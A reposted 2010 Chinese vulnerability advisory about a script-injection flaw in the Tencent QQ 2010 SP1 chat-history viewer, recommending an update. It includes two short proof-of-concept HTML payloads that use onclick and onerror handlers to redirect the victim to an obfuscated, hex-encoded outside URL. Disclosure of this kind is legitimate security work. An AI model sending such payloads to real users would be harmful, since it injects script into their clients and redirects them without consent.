蓝盟诗人[LUC]蓝客联盟

忘记密码

腾讯QQ 2010SP1消息记录远程代码注入漏洞及修复

2010-10-28 21:46 作者: 来源: 本站 浏览: 1,108 views 我要评论 字号:

影响版本:
Tencent QQ 2010 SP1漏洞描述:
腾讯QQ是一款在中国非常广泛使用的即时聊天工具。
腾讯QQ 2010 SP1在处理消息记录时,没有对会话消息中的Javascript和Html标签进行正确转义,攻击者可以发送恶意消息注入脚本代码并执行。

<*参考
TGL
*>
测试方法:
<input onclick="window.location=' x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d'"/>
<img src='tetet' onerror="window.location='x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d'"/>SEBUG安全建议:
最新版本的腾讯QQ已经修复此漏洞,建议用户下载使用:
http://im.qq.com/qq/dlqq.shtml

打印
分享到:
复制链接

发表评论

*

* (保密)

Ctrl+Enter 快捷回复

会员登录关闭

记住我 忘记密码

注册会员关闭

小提示: 您的密码会通过填写的"电子邮箱"发送给您.

/** **/